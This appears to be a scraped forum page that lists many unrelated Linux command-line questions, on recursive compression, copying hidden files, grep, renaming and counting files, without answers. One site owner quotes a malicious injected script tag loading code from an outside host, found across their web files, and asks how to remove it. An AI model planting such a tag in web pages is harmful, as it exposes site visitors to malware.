General :: Command Line - Compressing All .pdf Files Recursively (.tar)?
Jun 20, 2011
At the linux command line, I'd like to compress all .pdf files in a directory, any of it's subdirectories and so on - but only .pdf files. I'm struggling to figure out the syntax
How do I get a task bar for the commmand line for the tar.gz or tar.bz2 when compressing files? I want a task like wget has for download and like you get when you tar.gz or tar.bz2 with a gui.
which does not work on the invisible directories (why?). When I used ".*" as wildcard it changed all (visible) files including the parent directory (the one I was currently working in which is the "dot") . I can change the invisible directories owner and group using dophin but how is it done from the command line?
suppose in my current directory, I have 50 sub-directories. Now, I am interested only in about 20 of those sub-directories (whose names match a pattern). I would like to recursively list the contents of these 20 sub-directories. How do I do that ? I would like to do this in Solaris 10 and Linux(RHEL 5.x).
I just got an email from google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed its recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and txt files recursively and delete that line from them? I don't know how it got in all of them.
I use Linux. I coded a screenshot program some time ago and now I have 9 GIG of screenshots, 60000 JPEGs, most of them look pretty similar, and I have 300 MB of disk space remaining.
What are some good ways to start to compress batches of them (or all of them) in the background given the limited space? The problem with compressing the folder all at once is that I wouldn't have enough disk space for that. It seems the process needs to be broken down into chunks. So maybe something like: Get a list of all the files Add a chunk of the files (say, 20) to a compressed archive. Once it is done and saved successfully, delete the chunk of files
I'm looking for a solution for the following simple problem. I have two files, fileA and fileB. Each file contains only one word per line, and they contain exactly the same number of lines. I would like to create a new file called fileAB, where the i-th line contains the i-th line of fileA, a Tab separator character, and then the i-th line of fileB. I know how to do it in Python or other scripting languages, but it would be nice to have a bash one-liner for that. Is it possible to do this in bash or any other Unix shell, using the tools that are usually available on the command line (e.g., sed, awk and such)?
I have huge text files with two fields, the first is a string the second is an integer. The files are sorted by the first field. What I'd like to get in the output is one line per unique string and the sum of the numbers for the identical strings. Some strings appear only once while other appear multiple times. Given the sample data below, for the string glehnia I'd like to get 10+22=32 in the result. how to do this either with gnuwin32 command line tools or in linux shell?
I have a large amount of log files that I need to remove sensitive data from. The sensitive data is provided to me in a text file and is prone to change. I had hoped to do the equivalent of this:
[Code]....
The commented out egrep works fine, the sed doesn't. Am I right to use sed for this? Or is there a more apt route to take?
How do I access files with spaces from the command line? for example I want to go to a file called "New File" and let's say is in Downloads/Books/(and here is the file) how do I input the space since the command line doesn't recognize it?
Lets say I have 20 files named FOOXX, where XX is the number of the file, eg 01, 02 etc. At the moment, if I want to delete all files lower than the number 10, this is easy and I just use a wildcard, eg rm FOO0* However, if I want to delete specific files ina range, eg 13-15, this becomes more difficult. rm FPP[13-15] does not work, and asks me if I wish to delete all files. Likewse rm FOO1[3-5] wishes to delete all files that begin with FOO1 So, what is the best way to delete ranges of files like this? I have tried with both bash and zsh, and I don't think they differ so much for such a basic task?
This has to also show the line count. I can get it to show the files but not the line count. What is the single command used to identify only the matching count of all lines within files under the /etc directory that contain the word „HOST? List only the files with matches and suppress any error messages.
I am using ubuntu and mysql.I have a list of many .sql files, like 1.sql, 2.sql, 3.sql ... 100000.sqlI need to insert them into the database mysql mydb < *.sqlGives me: -bash: *.sql: ambiguous redirect
i have a collection of text files for 50 gbs..i want to compress these files and store them into dvds.i want to know the present popular optimized method to compress the files.let me know masters.
I want to copy all directories, files, and hidden files and hidden directories with one command. I want these items to replace any same items in the target directory.
I have tried several things, such as:
cp -r * cp -aR *
but I only seem to get visible files and directories. Obviously, I am missing something. (A brain, probably....)
I need to copy all subdirectories and files from one directory to another ever 5 minutes or so, with the old data automatically being overwritten with the new data. I'd also like this to run at startup. Is there any way this can be done? If so, what program would I need to schedule the automation and what is the command line I would need.
Write a script that will take a list of filenames as arguments and output a count of how many of them are regular files, and how many of them are scripts (if the file is executable, it will be assumed to be a script file)
If I pass in /home, I would like for it to return 4 files. Or, bonus points if it returns 4 files, 2 directories. Basically, I want the equivalent of right-clicking a folder on Windows and selecting properties and seeing how many files/folders are contained in that folder.
How can I most easily do this? I have a solution involving a Python script I wrote, but why isn't this as easy as running ls | wc or similar?
The rm command man pages discusses removing files or directories recursively. So what is meant by deleting a file or directory recursively? And what are some reasons for doing so?
What I would like to do is to print the contents of all text files in a particular directory, recursively. Problem being that there are directories and possibly binaries scattered around in the filesystem as well.
Trying cat * works as long as there are no directories in there, but when there are it gives an error instead and prints nothing.
I'm sure it's easy using file -f or something but I can't figure it!
I'm planning to writing a script to rename files recursively.
To be said that I'm using /bin/sh (not /bin/bash) as this is the only shell available on the busybox of the linux router (tomato) I'm using.
Basically I would like to rename files with extension .jpg using as a suffix the filename of another file in the very same directory with extension .avi
The reason for this is because pretty much all the DLNA devices like modern TV playing .avi files will display a thumbnail of the video when browsing the filesystem, however to do so they'll need .jpg image wit hthe same filename of the video in the very same directory.
I made an account under freeshell.org and it has been very satisfactory so far. I recommend everyone getting an account under freeshell.org. But anyways, how do I find files over, for example, 500 KB, in the entire, my shell account?
I'm a frequent user of grep. I know that I can recursively search a directory using the -r flag: Code: // will recursively search all files grep -r 'some string' *
However, if I want to limit my search to PHP files, the -r flag is suddenly useless: Code: // for some reason, this only searches the PHP files in the current dir grep -r 'some string' *.php
Any good way to recursively search a directory and its subdirs for a string but ONLY look at PHP or HTML files (and possibly TXT files too) ? I'm really hoping for a nice, short command that doesn't involve using an exclude file and which isn't really painful to type. I do this kind of search very frequently and have resorted to either searching EVERY file which is really slow (TAR and ZIP files really slow it down) OR typing repeated commands to search *.php, */*.php, etc.
Is there a method at the command line to copy files from one location to another and retain the source files group and user?I'm migrating some MySQL files from one machine to another.I want to back-up the original files in the directory presently. They have owner:group of mysql, some have owner:group root:mysql and so on. To copy them under cli or Nautilus everything changes to root for I execute sudo cp or gksudo nautilus and copy via gui.
Since it is MySQL data I could simply do a dump of the database and restore it on the other machine. But there's about 20 db's and I want to do this via a copy for it will be faster - at least that is what I think.
I want to list recursively all files in given direcotry, with their fullpath and their timestamps.Something like this:10:30 Dec 10 2010 /tmp/mydir/myfileI've tryied with:find . -type f -exec ls -la {} ;but that don't give me the fullpath.
I'm using a mac, and just transferred a bunch o photos from another computer, and as it turns out, there is a bunch of duplicates.I'm not too familiar with the mac terminal, but if there is a solution for linux, it will probably work for the mac.Just need to be able to recursively scan all folders in my Pictures folder and then Delete them.